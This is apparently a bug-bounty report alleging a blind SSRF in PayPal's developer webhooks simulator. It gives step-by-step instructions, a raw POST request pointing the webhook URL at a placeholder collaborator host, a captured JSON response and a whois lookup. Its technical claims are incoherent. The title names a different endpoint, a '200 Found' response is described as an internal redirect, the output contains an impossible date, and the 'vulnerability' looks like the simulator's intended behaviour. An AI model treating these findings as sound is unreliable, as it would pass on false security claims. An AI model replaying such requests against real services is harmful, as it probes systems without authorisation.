Blind SSRF due lack of access controls via /v1/billing/plans Endpoint.

[imhunterand]

Describe the bug
Web applications hosted on the "developer.paypal.com" domain are affected by a Server Side Request Forgery (SSRF) vulnerability that could allow an attacker to force an application to make requests to arbitrary targets. attacker can insert malicious code_injection via parameter "simulator webhooks api" at directory "https://developer.paypal.com/developer/webhooksSimulator" vulnerability that I found is SSRF vulnerability in the "Base API URL" filling form I insert the ssrf code which will be sent by server developer.paypal.com via a request parameter and the results show that these parameters are vulnerable to malicious code ssrf attacks.

To Reproduce

• Login into your paypal account
• Visit thread page is https://developer.paypal.com/developer/webhooksSimulator
• Add new webhooks simulators URL
• Set up the payloads in simulators URL App that is under your control (e.g. http://<burpcollaborate-server.sh>/$id)
• Sent the request URL with the following contents:

POST /developer/webhooksSimulator/testWebhook HTTP/2
Host: developer.paypal.com
Upgrade-Insecure-Requests: 1
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Ch-Ua-Mobile: ?0
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
Transfer-Encoding: chunked

url=http://<burpcollaborate-server.sh>/&event_type=BILLING.PLAN.ACTIVATED&api_version=2.0&_csrf=tX9SyVRmkqk%2FX6lYe%2BsIZIpSz8WNe%2FYpZXXY0%3D

• respond with a 200 Found response that redirects back to the internal network using the Location webhooks:

{
    "msg": "{\n  \"id\": \"WH-55TG7562XN2588878-8YH955435R661687G\",\n  \"create_time\": \"2018-19-12T22:20:32.000Z\",\n  \"resource_type\": \"plan\",\n  \"event_type\": \"BILLING.PLAN.ACTIVATED\",\n  \"summary\": \"A billing plan was activated.\",\n  \"resource\": {\n    \"update_time\": \"2018-12-10T21:20:49Z\",\n    \"create_time\": \"2018-12-10T21:20:49Z\",\n    \"usage_type\": \"LICENSED\",\n    \"payment_preferences\": {\n      \"service_type\": \"PREPAID\",\n      \"auto_bill_outstanding\": true,\n      \"setup_fee\": {\n        \"value\": \"10\",\n        \"currency_code\": \"USD\"\n      },\n      \"setup_fee_failure_action\": \"CONTINUE\",\n      \"payment_failure_threshold\": 3\n    },\n    \"product_id\": \"PROD-XXCD1234QWER65782\",\n    \"name\": \"Zoho Marketing Campaign  Plan\",\n    \"billing_cycles\": [\n      {\n        \"frequency\": {\n          \"interval_unit\": \"MONTH\",\n          \"interval_count\": 1\n        },\n        \"tenure_type\": \"TRIAL\",\n        \"sequence\": 1,\n        \"total_cycles\": 1,\n        \"pricing_scheme\": {\n          \"fixed_price\": {\n            \"value\": \"50\",\n            \"currency_code\": \"USD\"\n          },\n          \"tier_mode\": \"VOLUME\",\n          \"tiers\": [\n            {\n              \"starting_quantity\": \"1\",\n              \"ending_quantity\": \"1000\",\n              \"amount\": {\n                \"value\": \"100\",\n                \"currency_code\": \"USD\"\n              }\n            },\n            {\n              \"starting_quantity\": \"1001\",\n              \"amount\": {\n                \"value\": \"200\",\n                \"currency_code\": \"USD\"\n              }\n            }\n          ]\n        }\n      },\n      {\n        \"frequency\": {\n          \"interval_unit\": \"MONTH\",\n          \"interval_count\": 1\n        },\n        \"tenure_type\": \"REGULAR\",\n        \"sequence\": 2,\n        \"total_cycles\": 12,\n        \"pricing_scheme\": {\n          \"fixed_price\": {\n            \"value\": \"100\",\n            \"currency_code\": \"USD\"\n          },\n          \"tier_mode\": \"VOLUME\",\n          \"tiers\": [\n            {\n              \"starting_quantity\": \"1\",\n              \"ending_quantity\": \"1000\",\n              \"amount\": {\n                \"value\": \"300\",\n                \"currency_code\": \"USD\"\n              }\n            },\n            {\n              \"starting_quantity\": \"1001\",\n              \"amount\": {\n                \"value\": \"1000\",\n                \"currency_code\": \"USD\"\n              }\n            }\n          ]\n        }\n      }\n    ],\n    \"description\": \"Zoho Marketing Campaign Plan\",\n    \"taxes\": {\n      \"percentage\": \"10\",\n      \"inclusive\": false\n    },\n    \"links\": [\n      {\n        \"href\": \"https://api.paypal.com/v1/billing/plans/P-5ML4271244454362WXNWU5NQ\",\n        \"rel\": \"self\",\n        \"method\": \"GET\"\n      },\n      {\n        \"href\": \"https://api.paypal.com/v1/billing/plans/P-5ML4271244454362WXNWU5NQ\",\n        \"rel\": \"edit\",\n        \"method\": \"PATCH\"\n      }\n    ],\n    \"id\": \"P-7GL4271244454362WXNWU5NQ\",\n    \"status\": \"ACTIVE\"\n  },\n  \"links\": [\n    {\n      \"href\": \"https://api.paypal.com/v1/notifications/webhooks-events/WH-55TG7562XN2588878-8YH955435R661687G\",\n      \"rel\": \"self\",\n      \"method\": \"GET\",\n      \"encType\": \"application/json\"\n    },\n    {\n      \"href\": \"https://api.paypal.com/v1/notifications/webhooks-events/WH-55TG7562XN2588878-8YH955435R661687G/resend\",\n      \"rel\": \"resend\",\n      \"method\": \"POST\",\n      \"encType\": \"application/json\"\n    }\n  ],\n  \"event_version\": \"1.0\",\n  \"resource_version\": \"2.0\"\n}",
    "sys": {
        "links": {
            "jsBaseUrl": "https://www.paypalobjects.com/web/res/73e/1ed92776d5cffb6e95c7d692afc06/js",
            "cssBaseUrl": "https://www.paypalobjects.com/web/res/73e/1ed92776d5cffb6e95c7d692afc06/css",
            "templateBaseUrl": "/developer/templates/US/en",
            "resourceBaseUrl": "https://www.paypalobjects.com/web/res/73e/1ed92776d5cffb6e95c7d692afc06",
            "originalTemplateBaseUrl": "https://www.paypalobjects.com/web/res/73e/1ed92776d5cffb6e95c7d692afc06/templates"
        },
        "pageInfo": {
            "date": "Jul 24, 2022 09:42:23 -07:00",
            "hostName": "rZJvnqaaQhLn/nmWT8cSUjOx898qoYZ0LAAtHZbcxVKrr1IEXqHCc9RJfEB9tWaV",
            "rlogId": "rZJvnqaaQhLn%2FnmWT8cSUoqGMZoNnLVa4RXTPX0ZBY504N5%2FhqeuQ2Kujhb8lkvTuyYXEkiodA3CKv7HeUfh7Q_1823116a39d",
            "script": "node",
            "debug": null
        },
        "locality": {
            "timezone": {
                "determiner": "viaUserProfile",
                "value": "Asia/Manila"
            },
            "country": "PH",
            "locale": "en_US",
            "language": "en",
            "directionality": "ltr"
        },
        "tracking": {
            "fpti": {
                "name": "pta",
                "jsURL": "https://www.paypalobjects.com",
                "serverURL": "https://t.paypal.com/ts",
                "dataString": "pgrp=main%3Adeveloper%3Adashboard%3AwebhooksSimulator%3AtestWebhook&page=main%3Adeveloper%3Adashboard%3AwebhooksSimulator%3AtestWebhook&pgst=1658680943517&calc=72de08af65101&nsid=6sMG7cTHhYsi3_VoEQWLJkxgRoxnq2Ke&rsta=en_US&pgtf=Nodejs&env=live&s=ci&ccpg=PH&csci=e8ba58b70f164b339db342c10e2aa741&comp=developernodeweb&tsrce=developernodeweb&cu=1&gacook=1047388967.1657043574&c_prefs=T%3D1%2CP%3D1%2CF%3D1%2Ctype%3Dexplicit_banner&cust=TVY9966UVD7QY&party_id=TVY9966UVD7QY&acnt=premier&aver=unverified&rstr=unrestricted&cnac=PH&xe=100963%2C101765%2C104105%2C104539%2C104156%2C104751%2C105045%2C105268%2C105174%2C105464&xt=104129%2C106024%2C116994%2C119781%2C117409%2C121284%2C122170%2C123238%2C123360%2C124179&eccd=&event_category=&lgin=in&fltp=developer_portal_flow&weblls_enabled=false"
            }
        }
    }
}

Whois endpoint

root@defcon-exploit: ~ whois 173.0.81.140

NetRange:       173.0.80.0 - 173.0.95.255
CIDR:           173.0.80.0/20
NetName:        PAYPAL-SITE
NetHandle:      NET-173-0-80-0-1
Parent:         NET173 (NET-173-0-0-0-0)
NetType:        Direct Allocation
OriginAS:       AS17012
Organization:   PayPal, Inc. (PAYPAL)
RegDate:        2010-06-22
Updated:        2021-12-14
Ref:            https://rdap.arin.net/registry/ip/173.0.80.0


OrgName:        PayPal, Inc.
OrgId:          PAYPAL
Address:        2211 N. First St.
City:           San Jose
StateProv:      CA
PostalCode:     95131
Country:        US
RegDate:        2001-08-17
Updated:        2019-04-10
Ref:            https://rdap.arin.net/registry/entity/PAYPAL


OrgTechHandle: PAYPA-ARIN
OrgTechName:   PayPal Network
OrgTechPhone:  +1-408-967-5100
OrgTechEmail:  [email protected]
OrgTechRef:    https://rdap.arin.net/registry/entity/PAYPA-ARIN

OrgAbuseHandle: NETWO8902-ARIN
OrgAbuseName:   Network Abuse
OrgAbusePhone:  +1-480-967-5100
OrgAbuseEmail:  [email protected]
OrgAbuseRef:    https://rdap.arin.net/registry/entity/NETWO8902-ARIN

RAbuseHandle: NETWO8902-ARIN
RAbuseName:   Network Abuse
RAbusePhone:  +1-480-967-5100
RAbuseEmail:  [email protected]
RAbuseRef:    https://rdap.arin.net/registry/entity/NETWO8902-ARIN

RNOCHandle: PAYPA1-ARIN
RNOCName:   PayPal
RNOCPhone:  +1-480-967-5100
RNOCEmail:  [email protected]
RNOCRef:    https://rdap.arin.net/registry/entity/PAYPA1-ARIN

RTechHandle: PAYPA1-ARIN
RTechName:   PayPal
RTechPhone:  +1-480-967-5100
RTechEmail:  [email protected]
RTechRef:    https://rdap.arin.net/registry/entity/PAYPA1-ARIN

Screenshots/Videos

VIDEOS

Potential fix
To prevent SSRF vulnerabilities in your web applications it is strongly advised to use a whitelist of allowed domains and protocols from where the web server can fetch remote resources. If possible avoid using user input directly in functions that can make requests on behalf of the server.

Impact
Successful SSRF attack can often result in unauthorized actions or access to data within the organization, either in the vulnerable application itself or on other back-end systems that the application can communicate with. and SSRF is a dangerous web vulnerability caused by bad programming. SSRF lets attackers send requests from the server to other resources, both internal and external, and receive responses.